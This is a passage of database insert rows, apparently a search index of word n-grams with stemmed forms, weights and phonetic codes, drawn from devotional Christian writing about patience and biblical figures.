(289794, 'longsuffering with', 'longsuff with', 0, 1, 1.6, 'L5216523', 1, '*'),
(289795, 'longsuffering with people', 'longsuff with people', 0, 1, 1.8333, 'L521652314', 1, '*'),
(289796, 'lord as', 'lord as', 0, 1, 1.2333, 'L632', 2, '*'),
(289797, 'lord as a', 'lord as a', 0, 1, 1.3, 'L632', 1, '*'),
(289798, 'make avoidable', 'make avoidable', 0, 1, 1.4667, 'M21314', 1, '*'),
(289799, 'make avoidable mistakes', 'make avoidable mistakes', 0, 1, 1.7667, 'M213145232', 1, '*'),
(289800, 'many times says', 'mani times says', 0, 1, 1.5, 'M352', 1, '*'),
(289801, 'mature success', 'matur success', 0, 1, 1.4667, 'M362', 1, '*'),
(289802, 'mature success is', 'matur success is', 0, 1, 1.5667, 'M362', 1, '*'),
(289803, 'may take', 'mai take', 0, 1, 1.2667, 'M320', 1, '*'),
(289804, 'may take you', 'mai take you', 0, 1, 1.4, 'M320', 1, '*'),
(289805, 'may you have', 'mai you have', 0, 1, 1.4, 'M100', 1, '*'),
(289806, 'mistakes there', 'mistak there', 0, 1, 1.4667, 'M23236', 1, '*'),
(289807, 'mistakes there is', 'mistak there is', 0, 1, 1.5667, 'M232362', 1, '*'),
(289808, 'most likely', 'most likely', 0, 1, 1.3667, 'M23424', 1, '*'),
(289809, 'most likely you', 'most likely you', 0, 1, 1.5, 'M23424', 1, '*'),
(289810, 'must allow', 'must allow', 0, 1, 1.3333, 'M234', 1, '*'),
(289811, 'must allow for', 'must allow for', 0, 1, 1.4667, 'M23416', 1, '*'),
(289812, 'must be patient', 'must be patient', 0, 1, 1.5, 'M231353', 1, '*'),
(289813, 'must settle', 'must settle', 0, 1, 1.3667, 'M23234', 1, '*'),
(289814, 'must settle down', 'must settle down', 0, 1, 1.5333, 'M2323435', 1, '*'),
(289815, 'need endurance', 'need endurance', 0, 1, 1.4667, 'N353652', 1, '*'),
(289816, 'need endurance when', 'need endurance when', 0, 1, 1.6333, 'N3536525', 1, '*'),
(289817, 'need longsuffering', 'need longsuffering', 0, 1, 1.6, 'N34521652', 1, '*'),
(289818, 'need longsuffering with', 'need longsuffering with', 0, 1, 1.7667, 'N345216523', 1, '*'),
(289819, 'need of patience', 'need of patience', 0, 1, 1.5333, 'N31352', 1, '*'),
(289820, 'need to exercise', 'need to exercise', 0, 1, 1.5333, 'N3262', 1, '*'),
(289821, 'need when', 'need when', 0, 1, 1.3, 'N350', 1, '*'),
(289822, 'need when you', 'need when you', 0, 1, 1.4333, 'N350', 1, '*'),
(289823, 'need with', 'need with', 0, 1, 1.3, 'N300', 1, '*'),
(289824, 'need with god', 'need with god', 0, 1, 1.4333, 'N323', 1, '*'),
(289825, 'never asking', 'never asking', 0, 1, 1.4, 'N16252', 1, '*'),
(289826, 'never asking you', 'never asking you', 0, 1, 1.5333, 'N16252', 1, '*'),
(289827, 'new year to', 'new year to', 0, 1, 1.3667, 'N630', 1, '*'),
(289828, 'not a destination', 'not a destination', 0, 1, 1.5667, 'N323535', 1, '*'),
(289829, 'not before', 'not before', 0, 1, 1.3333, 'N316', 1, '*'),
(289830, 'not before but', 'not before but', 0, 1, 1.4667, 'N31613', 1, '*'),
(289831, 'not possible', 'not possible', 0, 1, 1.4, 'N31214', 1, '*'),
(289832, 'not possible so', 'not possible so', 0, 1, 1.5, 'N312142', 1, '*'),
(289833, 'now and that', 'now and that', 0, 1, 1.4, 'N300', 1, '*'),
(289834, 'now most', 'now most', 0, 1, 1.2667, 'N230', 1, '*'),
(289835, 'now most likely', 'now most likely', 0, 1, 1.5, 'N23424', 1, '*'),
(289836, 'now when i', 'now when i', 0, 1, 1.3333, 'N000', 1, '*'),
(289837, 'obtain what', 'obtain what', 0, 1, 1.3667, 'O1353', 1, '*'),
(289838, 'obtain what he', 'obtain what he', 0, 1, 1.4667, 'O1353', 1, '*'),
(289839, 'of arrival', 'of arrival', 0, 1, 1.3333, 'O1614', 1, '*'),
(289840, 'of arrival god', 'of arrival god', 0, 1, 1.4667, 'O161423', 1, '*'),
(289841, 'of god keep', 'of god keep', 0, 1, 1.3667, 'O12321', 1, '*'),
(289842, 'of god not', 'of god not', 0, 1, 1.3333, 'O12353', 1, '*'),
(289843, 'of god stand', 'of god stand', 0, 1, 1.4, 'O1232353', 1, '*'),
(289844, 'of his people', 'of his people', 0, 1, 1.4333, 'O1214', 1, '*'),
(289845, 'of patience', 'of patience', 0, 1, 1.3667, 'O1352', 1, '*'),
(289846, 'of patience after', 'of patience after', 0, 1, 1.5667, 'O1352136', 1, '*'),
(289847, 'of the same', 'of the same', 0, 1, 1.3667, 'O1325', 1, '*'),
(289848, 'of you to', 'of you to', 0, 1, 1.3, 'O130', 1, '*'),
(289849, 'one year', 'on year', 0, 1, 1.2667, 'O560', 1, '*'),
(289850, 'one year that', 'on year that', 0, 1, 1.4333, 'O563', 1, '*'),
(289851, 'out your best', 'out your best', 0, 1, 1.4333, 'O36123', 1, '*'),
(289852, 'patience after', 'patienc after', 0, 1, 1.4667, 'P352136', 1, '*'),
(289853, 'patience after you', 'patienc after you', 0, 1, 1.6, 'P352136', 1, '*'),
(289854, 'patience in', 'patienc in', 0, 1, 1.3667, 'P3525', 1, '*'),
(289855, 'patience in this', 'patienc in this', 0, 1, 1.5333, 'P352532', 1, '*'),
(289856, 'patience is waiting', 'patienc is waiting', 0, 1, 1.6333, 'P352352', 1, '*'),
(289857, 'patience is what', 'patienc is what', 0, 1, 1.5333, 'P3523', 1, '*'),
(289858, 'patience longsuffering', 'patienc longsuffering', 0, 1, 1.7333, 'P3524521652', 1, '*'),
(289859, 'patience longsuffering and', 'patienc longsuffering and', 0, 1, 1.8667, 'P352452165253', 1, '*'),
(289860, 'patience that we', 'patienc that we', 0, 1, 1.5333, 'P3523', 1, '*'),
(289861, 'patience with', 'patienc with', 0, 1, 1.4333, 'P3523', 1, '*'),
(289862, 'patience with divine', 'patienc with divine', 0, 1, 1.6667, 'P352315', 1, '*'),
(289863, 'patient and keep', 'patient and keep', 0, 1, 1.5333, 'P3535321', 1, '*'),
(289864, 'patient with', 'patient with', 0, 1, 1.4, 'P353', 1, '*'),
(289865, 'patient with god', 'patient with god', 0, 1, 1.5333, 'P35323', 1, '*'),
(289866, 'patient with us', 'patient with us', 0, 1, 1.5, 'P3532', 1, '*'),
(289867, 'people always', 'peopl always', 0, 1, 1.4333, 'P420', 1, '*'),
(289868, 'people always want', 'peopl always want', 0, 1, 1.6, 'P4253', 1, '*'),
(289869, 'people impatience', 'peopl impatience', 0, 1, 1.5667, 'P451352', 1, '*'),
(289870, 'people impatience can', 'peopl impatience can', 0, 1, 1.7, 'P4513525', 1, '*'),
(289871, 'people must', 'peopl must', 0, 1, 1.3667, 'P4523', 1, '*'),
(289872, 'people must be', 'peopl must be', 0, 1, 1.4667, 'P45231', 1, '*'),
(289873, 'people you need', 'peopl you need', 0, 1, 1.5, 'P453', 1, '*'),
(289874, 'person to make', 'person to make', 0, 1, 1.4667, 'P625352', 1, '*'),
(289875, 'place of arrival', 'place of arrival', 0, 1, 1.5333, 'P421614', 1, '*'),
(289876, 'placed in', 'place in', 0, 1, 1.3, 'P4235', 1, '*'),
(289877, 'placed in your', 'place in your', 0, 1, 1.4667, 'P42356', 1, '*'),
(289878, 'possible for', 'possibl for', 0, 1, 1.4, 'P21416', 2, '*'),
(289879, 'possible for you', 'possibl for you', 0, 1, 1.5333, 'P21416', 1, '*'),
(289880, 'possible so', 'possibl so', 0, 1, 1.3667, 'P2142', 1, '*'),
(289881, 'possible so you', 'possibl so you', 0, 1, 1.5, 'P2142', 1, '*'),
(289882, 'promised have', 'promis have', 0, 1, 1.4333, 'P65231', 1, '*'),
(289883, 'promised have you', 'promis have you', 0, 1, 1.5667, 'P65231', 1, '*'),
(289884, 'putting out', 'put out', 0, 1, 1.3667, 'P3523', 1, '*'),
(289885, 'putting out your', 'put out your', 0, 1, 1.5333, 'P35236', 1, '*'),
(289886, 'race after', 'race after', 0, 1, 1.3333, 'R2136', 1, '*'),
(289887, 'race after you', 'race after you', 0, 1, 1.4667, 'R2136', 1, '*'),
(289888, 're-write', 're-write', 0, 0, 0.5333, 'R300', 1, '*'),
(289889, 're-write them', 're-write them', 0, 1, 1.4333, 'R350', 1, '*'),
(289890, 're-write them just', 're-write them just', 0, 1, 1.6, 'R3523', 1, '*'),
(289891, 'read them i', 'read them i', 0, 1, 1.3667, 'R350', 1, '*'),
(289892, 'receive the calling', 'receiv the calling', 0, 1, 1.6333, 'R2132452', 1, '*'),
(289893, 'required of', 'requir of', 0, 1, 1.3667, 'R2631', 1, '*'),
(289894, 'required of you', 'requir of you', 0, 1, 1.5, 'R2631', 1, '*'),
(289895, 'requires constancy', 'requir constancy', 0, 1, 1.6, 'R26252352', 1, '*'),
(289896, 'requires constancy in', 'requir constancy in', 0, 1, 1.7, 'R262523525', 1, '*'),
(289897, 'right and that', 'right and that', 0, 1, 1.4667, 'R2353', 1, '*'),
(289898, 'salvation of the', 'salvat of the', 0, 1, 1.5333, 'S413513', 2, '*'),
(289899, 'same father', 'same father', 0, 1, 1.3667, 'S5136', 1, '*'),
(289900, 'same father you', 'same father you', 0, 1, 1.5, 'S5136', 1, '*'),
(289901, 'says stand', 'sai stand', 0, 1, 1.3333, 'S353', 1, '*'),
(289902, 'says stand now', 'sai stand now', 0, 1, 1.4667, 'S3535', 1, '*'),
(289903, 'says you', 'sai you', 0, 1, 1.2667, 'S000', 1, '*'),
(289904, 'says you are', 'sai you are', 0, 1, 1.4, 'S600', 1, '*'),
(289905, 'says you have', 'sai you have', 0, 1, 1.4333, 'S100', 1, '*'),
(289906, 'seed and', 'seed and', 0, 1, 1.2667, 'S353', 1, '*'),
(289907, 'seed and keep', 'seed and keep', 0, 1, 1.4333, 'S35321', 1, '*'),
(289908, 'settle down', 'settl down', 0, 1, 1.3667, 'S3435', 2, '*'),
(289909, 'settle down to', 'settl down to', 0, 1, 1.4667, 'S34353', 1, '*'),
(289910, 'small days', 'small days', 0, 1, 1.3333, 'S5432', 1, '*'),
(289911, 'small days to', 'small days to', 0, 1, 1.4333, 'S54323', 1, '*'),
(289912, 'so be', 'so be', 0, 1, 1.1667, 'S100', 1, '*'),
(289913, 'so be patient', 'so be patient', 0, 1, 1.4333, 'S1353', 1, '*'),
(289914, 'so you need', 'so you need', 0, 1, 1.3667, 'S530', 1, '*'),
(289915, 'some things that', 'some things that', 0, 1, 1.5333, 'S53523', 2, '*'),
(289916, 'soon because', 'soon because', 0, 1, 1.4, 'S512', 1, '*'),
(289917, 'soon because to', 'soon because to', 0, 1, 1.5, 'S5123', 1, '*'),
(289918, 'sowing seed', 'sow seed', 0, 1, 1.3667, 'S523', 1, '*'),
(289919, 'sowing seed and', 'sow seed and', 0, 1, 1.5, 'S52353', 1, '*'),
(289920, 'spirit in', 'spirit in', 0, 1, 1.3, 'S1635', 1, '*'),
(289921, 'spirit in one', 'spirit in one', 0, 1, 1.4333, 'S1635', 1, '*'),
(289922, 'stamina for', 'stamina for', 0, 1, 1.3667, 'S3516', 1, '*'),
(289923, 'stamina for the', 'stamina for the', 0, 1, 1.5, 'S35163', 1, '*'),
(289924, 'stand and stand', 'stand and stand', 0, 1, 1.5, 'S353532353', 1, '*'),
(289925, 'stand now', 'stand now', 0, 1, 1.3, 'S3535', 1, '*'),
(289926, 'stand now and', 'stand now and', 0, 1, 1.4333, 'S35353', 1, '*'),
(289927, 'stand therefore', 'stand therefore', 0, 1, 1.5, 'S353616', 1, '*'),
(289928, 'stand therefore having', 'stand therefore having', 0, 1, 1.7333, 'S353616152', 1, '*'),
(289929, 'start you', 'start you', 0, 1, 1.3, 'S363', 1, '*'),
(289930, 'start you must', 'start you must', 0, 1, 1.4667, 'S363523', 1, '*'),
(289931, 'starting so', 'start so', 0, 1, 1.3667, 'S36352', 1, '*'),
(289932, 'starting so be', 'start so be', 0, 1, 1.4667, 'S363521', 1, '*'),
(289933, 'step into all', 'step into all', 0, 1, 1.4333, 'S31534', 1, '*'),
(289934, 'success is', 'success is', 0, 1, 1.3333, 'S000', 1, '*'),
(289935, 'success is a', 'success is a', 0, 1, 1.4, 'S000', 1, '*'),
(289936, 'success is not', 'success is not', 0, 1, 1.4667, 'S530', 1, '*'),
(289937, 'sufficient', 'suffici', 0, 0, 0.6667, 'S1253', 1, '*'),
(289938, 'sufficient patience', 'suffici patience', 0, 1, 1.6333, 'S12531352', 1, '*'),
(289939, 'sufficient patience in', 'suffici patience in', 0, 1, 1.7333, 'S125313525', 1, '*'),
(289940, 'take you ten', 'take you ten', 0, 1, 1.4, 'T235', 1, '*'),
(289941, 'ten years', 'ten years', 0, 1, 1.3, 'T562', 1, '*'),
(289942, 'ten years what', 'ten years what', 0, 1, 1.4667, 'T5623', 1, '*'),
(289943, 'that he intends', 'that he intends', 0, 1, 1.5, 'T53532', 1, '*'),
(289944, 'that i believe', 'that i believe', 0, 1, 1.4667, 'T141', 1, '*'),
(289945, 'that is required', 'that is required', 0, 1, 1.5333, 'T26263', 1, '*'),
(289946, 'that is right', 'that is right', 0, 1, 1.4333, 'T2623', 1, '*'),
(289947, 'that now', 'that now', 0, 1, 1.2667, 'T500', 1, '*'),
(289948, 'that now when', 'that now when', 0, 1, 1.4333, 'T500', 1, '*'),
(289949, 'that the father', 'that the father', 0, 1, 1.5, 'T136', 1, '*'),
(289950, 'that we must', 'that we must', 0, 1, 1.4, 'T523', 1, '*'),
(289951, 'that we need', 'that we need', 0, 1, 1.4, 'T530', 1, '*'),
(289952, 'that “stand”', 'that “stand”', 0, 1, 1.4, 'T2353', 1, '*'),
(289953, 'that “stand” may', 'that “stand” may', 0, 1, 1.5333, 'T23535', 1, '*'),
(289954, 'the all', 'the all', 0, 1, 1.2333, 'T400', 1, '*'),
(289955, 'the all that', 'the all that', 0, 1, 1.4, 'T430', 1, '*'),
(289956, 'the books that', 'the books that', 0, 1, 1.4667, 'T123', 1, '*'),
(289957, 'the devil while', 'the devil while', 0, 1, 1.5, 'T140', 1, '*'),
(289958, 'the lives', 'the lives', 0, 1, 1.3, 'T412', 1, '*'),
(289959, 'the lives of', 'the lives of', 0, 1, 1.4, 'T4121', 1, '*'),
(289960, 'the long', 'the long', 0, 1, 1.2667, 'T452', 1, '*'),
(289961, 'the long distance', 'the long distance', 0, 1, 1.5667, 'T45232352', 1, '*'),
(289962, 'the lord as', 'the lord as', 0, 1, 1.3667, 'T4632', 2, '*'),
(289963, 'the mature', 'the mature', 0, 1, 1.3333, 'T536', 1, '*'),
(289964, 'the mature success', 'the mature success', 0, 1, 1.6, 'T5362', 1, '*'),
(289965, 'the salvation', 'the salvation', 0, 1, 1.4333, 'T24135', 2, '*'),
(289966, 'the salvation of', 'the salvation of', 0, 1, 1.5333, 'T241351', 2, '*'),
(289967, 'the same father', 'the same father', 0, 1, 1.5, 'T25136', 1, '*'),
(289968, 'the words patience', 'the words patience', 0, 1, 1.6, 'T6321352', 1, '*'),
(289969, 'them better', 'them better', 0, 1, 1.3667, 'T5136', 1, '*'),
(289970, 'them better there', 'them better there', 0, 1, 1.5667, 'T513636', 1, '*'),
(289971, 'them i', 'them i', 0, 1, 1.2, 'T500', 1, '*'),
(289972, 'them i want', 'them i want', 0, 1, 1.3667, 'T530', 1, '*'),
(289973, 'them just', 'them just', 0, 1, 1.3, 'T523', 1, '*'),
(289974, 'them just as', 'them just as', 0, 1, 1.4, 'T5232', 1, '*'),
(289975, 'them now', 'them now', 0, 1, 1.2667, 'T500', 1, '*'),
(289976, 'them now most', 'them now most', 0, 1, 1.4333, 'T523', 1, '*'),
(289977, 'them success', 'them success', 0, 1, 1.4, 'T520', 1, '*'),
(289978, 'them success is', 'them success is', 0, 1, 1.5, 'T520', 1, '*'),
(289979, 'therefore having', 'therefor having', 0, 1, 1.5333, 'T616152', 1, '*'),
(289980, 'therefore having done', 'therefor having done', 0, 1, 1.7, 'T61615235', 1, '*'),
(289981, 'things that i', 'thing that i', 0, 1, 1.4333, 'T523', 1, '*'),
(289982, 'think you', 'think you', 0, 1, 1.3, 'T520', 1, '*'),
(289983, 'think you have', 'think you have', 0, 1, 1.4667, 'T521', 1, '*'),
(289984, 'this new', 'thi new', 0, 1, 1.2667, 'T250', 1, '*'),
(289985, 'this new year', 'thi new year', 0, 1, 1.4333, 'T256', 1, '*'),
(289986, 'through us', 'through us', 0, 1, 1.3333, 'T620', 1, '*'),
(289987, 'through us you', 'through us you', 0, 1, 1.4667, 'T620', 1, '*'),
(289988, 'times says', 'time says', 0, 1, 1.3333, 'T520', 1, '*'),
(289989, 'times says you', 'time says you', 0, 1, 1.4667, 'T520', 1, '*'),
(289990, 'to a long', 'to a long', 0, 1, 1.3, 'T452', 1, '*'),
(289991, 'to arrive', 'to arrive', 0, 1, 1.3, 'T610', 1, '*'),
(289992, 'to arrive too', 'to arrive too', 0, 1, 1.4333, 'T613', 1, '*'),
(289993, 'to develop stamina', 'to develop stamina', 0, 1, 1.6, 'T141235', 1, '*'),
(289994, 'to do all', 'to do all', 0, 1, 1.3, 'T400', 1, '*'),
(289995, 'to do god', 'to do god', 0, 1, 1.3, 'T230', 1, '*'),
(289996, 'to do having', 'to do having', 0, 1, 1.4, 'T152', 1, '*'),
(289997, 'to do in', 'to do in', 0, 1, 1.2667, 'T500', 1, '*'),
(289998, 'to do patience', 'to do patience', 0, 1, 1.4667, 'T1352', 1, '*'),
(289999, 'to exercise patience', 'to exercise patience', 0, 1, 1.6667, 'T2621352', 1, '*'),
(290000, 'to make avoidable', 'to make avoidable', 0, 1, 1.5667, 'T521314', 1, '*'),
(290001, 'to re-write', 'to re-write', 0, 1, 1.3667, 'T630', 1, '*'),
(290002, 'to re-write them', 'to re-write them', 0, 1, 1.5333, 'T635', 1, '*'),
(290003, 'to step', 'to step', 0, 1, 1.2333, 'T231', 1, '*'),
(290004, 'to step into', 'to step into', 0, 1, 1.4, 'T23153', 1, '*'),
(290005, 'to the mature', 'to the mature', 0, 1, 1.4333, 'T536', 1, '*'),
(290006, 'to the place', 'to the place', 0, 1, 1.4, 'T142', 2, '*'),
(290007, 'to them success', 'to them success', 0, 1, 1.5, 'T520', 1, '*'),
(290008, 'too soon because', 'too soon because', 0, 1, 1.5333, 'T2512', 1, '*'),
(290009, 'trip', 'trip', 0, 0, 0.2667, 'T610', 1, '*'),
(290010, 'trip immature', 'trip immature', 0, 1, 1.4333, 'T61536', 1, '*'),
(290011, 'trip immature people', 'trip immature people', 0, 1, 1.6667, 'T6153614', 1, '*'),
(290012, 'triplets', 'triplet', 0, 0, 0.5333, 'T61432', 1, '*'),
(290013, 'triplets of', 'triplet of', 0, 1, 1.3667, 'T614321', 1, '*'),
(290014, 'triplets of the', 'triplet of the', 0, 1, 1.5, 'T6143213', 1, '*'),
(290015, 'unfolding', 'unfold', 0, 0, 0.6, 'U514352', 1, '*'),
(290016, 'unfolding journey', 'unfold journey', 0, 1, 1.5667, 'U51435265', 1, '*'),
(290017, 'unfolding journey and', 'unfold journey and', 0, 1, 1.7, 'U514352653', 1, '*'),
(290018, 'us and through', 'us and through', 0, 1, 1.4667, 'U25362', 1, '*'),
(290019, 'us we must', 'us we must', 0, 1, 1.3333, 'U2523', 1, '*'),
(290020, 'us with us', 'us with us', 0, 1, 1.3333, 'U232', 1, '*'),
(290021, 'us you', 'us you', 0, 1, 1.2, 'U200', 1, '*'),
(290022, 'us you can\'t', 'us you can', 0, 1, 1.4, 'U253', 1, '*'),
(290023, 'using your small', 'us your small', 0, 1, 1.5333, 'U2526254', 1, '*'),
(290024, 'waiting for the', 'wait for the', 0, 1, 1.5, 'W352163', 1, '*'),
(290025, 'want to arrive', 'want to arrive', 0, 1, 1.4667, 'W5361', 1, '*'),
(290026, 'want to re-write', 'want to re-write', 0, 1, 1.5333, 'W5363', 1, '*'),
(290027, 'we must allow', 'we must allow', 0, 1, 1.4333, 'W5234', 1, '*'),
(290028, 'we need with', 'we need with', 0, 1, 1.4, 'W530', 1, '*'),
(290029, 'what he promised', 'what he promised', 0, 1, 1.5333, 'W316523', 1, '*'),
(290030, 'what is impossible', 'what is impossible', 0, 1, 1.6, 'W3251214', 1, '*'),
(290031, 'what is legitimately', 'what is legitimately', 0, 1, 1.6667, 'W32423534', 1, '*'),
(290032, 'what you need', 'what you need', 0, 1, 1.4333, 'W353', 1, '*'),
(290033, 'whatever god allows', 'whatev god allows', 0, 1, 1.6333, 'W3162342', 1, '*'),
(290034, 'when i read', 'when i read', 0, 1, 1.3667, 'W563', 1, '*'),
(290035, 'when you think', 'when you think', 0, 1, 1.4667, 'W5352', 2, '*'),
(290036, 'while patience', 'while patience', 0, 1, 1.4667, 'W41352', 1, '*'),
(290037, 'while patience is', 'while patience is', 0, 1, 1.5667, 'W41352', 1, '*'),
(290038, 'will do them', 'will do them', 0, 1, 1.4, 'W435', 1, '*'),
(290039, 'with divine', 'with divine', 0, 1, 1.3667, 'W315', 1, '*'),
(290040, 'with divine working', 'with divine working', 0, 1, 1.6333, 'W3156252', 1, '*'),
(290041, 'with god also', 'with god also', 0, 1, 1.4333, 'W32342', 1, '*'),
(290042, 'with god god', 'with god god', 0, 1, 1.4, 'W32323', 1, '*'),
(290043, 'with people you', 'with people you', 0, 1, 1.5, 'W314', 1, '*'),
(290044, 'with us and', 'with us and', 0, 1, 1.3667, 'W3253', 1, '*'),
(290045, 'with us we', 'with us we', 0, 1, 1.3333, 'W320', 1, '*'),
(290046, 'words patience', 'word patience', 0, 1, 1.4667, 'W6321352', 1, '*'),
(290047, 'words patience longsuffering', 'word patience longsuffering', 0, 1, 1.9333, 'W63213524521652', 1, '*'),
(290048, 'write all', 'write all', 0, 1, 1.3, 'W634', 1, '*'),
(290049, 'write all the', 'write all the', 0, 1, 1.4333, 'W6343', 1, '*'),
(290050, 'written that', 'written that', 0, 1, 1.4, 'W6353', 1, '*'),
(290051, 'written that now', 'written that now', 0, 1, 1.5333, 'W63535', 1, '*'),
(290052, 'year that', 'year that', 0, 1, 1.3, 'Y630', 1, '*'),
(290053, 'year that is', 'year that is', 0, 1, 1.4, 'Y632', 1, '*'),
(290054, 'year to', 'year to', 0, 1, 1.2333, 'Y630', 1, '*'),
(290055, 'year to step', 'year to step', 0, 1, 1.4, 'Y63231', 1, '*'),
(290056, 'years ago', 'year ago', 0, 1, 1.3, 'Y620', 3, '*'),
(290057, 'years ago that', 'year ago that', 0, 1, 1.4667, 'Y623', 2, '*'),
(290058, 'years what', 'year what', 0, 1, 1.3333, 'Y623', 1, '*'),
(290059, 'years what is', 'year what is', 0, 1, 1.4333, 'Y6232', 1, '*'),
(290060, 'you are dealing', 'you are dealing', 0, 1, 1.5, 'Y63452', 1, '*'),
(290061, 'you are just', 'you are just', 0, 1, 1.4, 'Y623', 1, '*'),
(290062, 'you can obtain', 'you can obtain', 0, 1, 1.4667, 'Y25135', 1, '*'),
(290063, 'you can\'t write', 'you can write', 0, 1, 1.5, 'Y25363', 1, '*'),
(290064, 'you did five', 'you did five', 0, 1, 1.4, 'Y310', 1, '*'),
(290065, 'you done', 'you done', 0, 1, 1.2667, 'Y350', 1, '*'),
(290066, 'you done the', 'you done the', 0, 1, 1.4, 'Y353', 1, '*'),
(290067, 'you have gotten', 'you have gotten', 0, 1, 1.5, 'Y1235', 1, '*'),
(290068, 'you have need', 'you have need', 0, 1, 1.4333, 'Y153', 1, '*'),
(290069, 'you have sufficient', 'you have sufficient', 0, 1, 1.6333, 'Y121253', 1, '*'),
(290070, 'you know that', 'you know that', 0, 1, 1.4333, 'Y253', 1, '*'),
(290071, 'you must settle', 'you must settle', 0, 1, 1.5, 'Y523234', 1, '*'),
(290072, 'you need endurance', 'you need endurance', 0, 1, 1.6, 'Y5353652', 1, '*'),
(290073, 'you need longsuffering', 'you need longsuffering', 0, 1, 1.7333, 'Y534521652', 1, '*'),
(290074, 'you need when', 'you need when', 0, 1, 1.4333, 'Y535', 1, '*'),
(290075, 'you receive the', 'you receive the', 0, 1, 1.5, 'Y6213', 1, '*'),
(290076, 'you ten', 'you ten', 0, 1, 1.2333, 'Y350', 1, '*'),
(290077, 'you ten years', 'you ten years', 0, 1, 1.4333, 'Y3562', 1, '*'),
(290078, 'you think', 'you think', 0, 1, 1.3, 'Y352', 2, '*'),
(290079, 'you think you', 'you think you', 0, 1, 1.4333, 'Y352', 1, '*'),
(290080, 'your all', 'your all', 0, 1, 1.2667, 'Y640', 1, '*'),
(290081, 'your all keep', 'your all keep', 0, 1, 1.4333, 'Y6421', 1, '*'),
(290082, 'your best may', 'your best may', 0, 1, 1.4333, 'Y61235', 1, '*'),
(290083, 'your small', 'your small', 0, 1, 1.3333, 'Y6254', 1, '*'),
(290084, 'your small days', 'your small days', 0, 1, 1.5, 'Y625432', 1, '*'),
(290085, 'your spirit in', 'your spirit in', 0, 1, 1.4667, 'Y621635', 1, '*'),
(290086, '“stand”', '“stand”', 0, 0, 0.4667, '“2353', 1, '*'),
(290087, '“stand” may', '“stand” may', 0, 1, 1.3667, '“23535', 1, '*'),
(290088, '“stand” may take', '“stand” may take', 0, 1, 1.5333, '“2353532', 1, '*'),
(290552, '\'your', 'your', 0, 0, 0.3333, 'Y600', 1, '*'),
(290553, '\'your place\',', 'your place', 0, 1, 1.4333, 'Y6142', 1, '*'),
(290554, '11 you', '11 you', 0, 1, 1.2, 'Y000', 1, '*'),
(290555, '11 you made', '11 you made', 0, 1, 1.3667, 'Y530', 1, '*'),
(290556, '12 but', '12 but', 0, 1, 1.2, 'B300', 1, '*'),
(290557, '12 but he', '12 but he', 0, 1, 1.3, 'B300', 1, '*'),
(290558, '2 samuel 23', '2 samuel 23', 0, 1, 1.3667, 'S540', 1, '*'),
(290559, '2017 is', '2017 is', 0, 1, 1.2333, 'I200', 1, '*'),
(290560, '2017 is a', '2017 is a', 0, 1, 1.3, 'I200', 1, '*'),
(290561, '23 9', '23 9', 0, 1, 1.1333, '', 1, '*'),
(290562, '23 9 who', '23 9 who', 0, 1, 1.2667, 'W000', 1, '*'),
(290563, '27 8', '27 8', 0, 1, 1.1333, '', 1, '*'),
(290564, '27 8 like', '27 8 like', 0, 1, 1.3, 'L200', 1, '*'),
(290565, '8 like', '8 like', 0, 1, 1.2, 'L200', 1, '*'),
(290566, '8 like a', '8 like a', 0, 1, 1.2667, 'L200', 1, '*'),
(290567, '9 who held', '9 who held', 0, 1, 1.3333, 'W430', 1, '*'),
(290568, 'a bird', 'a bird', 0, 1, 1.2, 'A163', 1, '*'),
(290569, 'a bird that', 'a bird that', 0, 1, 1.3667, 'A163', 1, '*'),
(290570, 'a condition of', 'a condition of', 0, 1, 1.4667, 'A25351', 1, '*'),
(290571, 'a faithful son', 'a faithful son', 0, 1, 1.4667, 'A131425', 1, '*'),
(290572, 'a field', 'a field', 0, 1, 1.2333, 'A143', 1, '*'),
(290573, 'a field of', 'a field of', 0, 1, 1.3333, 'A1431', 1, '*'),
(290574, 'a great victory', 'a great victory', 0, 1, 1.5, 'A2631236', 1, '*'),
(290575, 'a hundred', 'a hundred', 0, 1, 1.3, 'A5363', 1, '*'),
(290576, 'a hundred folds', 'a hundred folds', 0, 1, 1.5, 'A53631432', 1, '*'),
(290577, 'a location', 'a location', 0, 1, 1.3333, 'A4235', 1, '*'),
(290578, 'a location it', 'a location it', 0, 1, 1.4333, 'A42353', 1, '*'),
(290579, 'a name', 'a name', 0, 1, 1.2, 'A500', 1, '*'),
(290580, 'a name above', 'a name above', 0, 1, 1.4, 'A510', 1, '*'),
(290581, 'a place called', 'a place called', 0, 1, 1.4667, 'A14243', 1, '*'),
(290582, 'a position', 'a position', 0, 1, 1.3333, 'A1235', 1, '*'),
(290583, 'a position your', 'a position your', 0, 1, 1.5, 'A12356', 1, '*'),
(290584, 'a state of', 'a state of', 0, 1, 1.3333, 'A231', 1, '*'),
(290585, 'a year for', 'a year for', 0, 1, 1.3333, 'A616', 1, '*'),
(290586, 'above all', 'abov all', 0, 1, 1.3, 'A140', 1, '*'),
(290587, 'above all names', 'abov all names', 0, 1, 1.5, 'A1452', 1, '*'),
(290588, 'absalom jonathan', 'absalom jonathan', 0, 1, 1.5333, 'A12452535', 1, '*'),
(290589, 'absalom jonathan adam', 'absalom jonathan adam', 0, 1, 1.7, 'A1245253535', 1, '*'),
(290590, 'adonija', 'adonija', 0, 0, 0.4667, 'A352', 1, '*'),
(290591, 'adonija absalom', 'adonija absalom', 0, 1, 1.5, 'A3521245', 1, '*'),
(290592, 'adonija absalom jonathan', 'adonija absalom jonathan', 0, 1, 1.8, 'A35212452535', 1, '*'),
(290593, 'against israel others', 'against israel others', 0, 1, 1.7, 'A2523264362', 1, '*'),
(290594, 'agee', 'age', 0, 0, 0.2667, 'A200', 1, '*'),
(290595, 'agee in', 'age in', 0, 1, 1.2333, 'A250', 1, '*'),
(290596, 'agee in the', 'age in the', 0, 1, 1.3667, 'A253', 1, '*'),
(290597, 'all left', 'all left', 0, 1, 1.2667, 'A413', 1, '*'),
(290598, 'all left their', 'all left their', 0, 1, 1.4667, 'A4136', 1, '*'),
(290599, 'all names', 'all names', 0, 1, 1.3, 'A452', 1, '*'),
(290600, 'all names lucifer', 'all names lucifer', 0, 1, 1.5667, 'A4524216', 1, '*'),
(290601, 'and defendedit', 'and defendedit', 0, 1, 1.4667, 'A53153', 1, '*'),
(290602, 'and defendedit and', 'and defendedit and', 0, 1, 1.6, 'A5315353', 1, '*'),
(290603, 'and displacement', 'and displacement', 0, 1, 1.5333, 'A53214253', 1, '*'),
(290604, 'and displacement but', 'and displacement but', 0, 1, 1.6667, 'A5321425313', 1, '*'),
(290605, 'and eve all', 'and eve all', 0, 1, 1.3667, 'A5314', 1, '*'),
(290606, 'and flourish', 'and flourish', 0, 1, 1.4, 'A531462', 1, '*'),
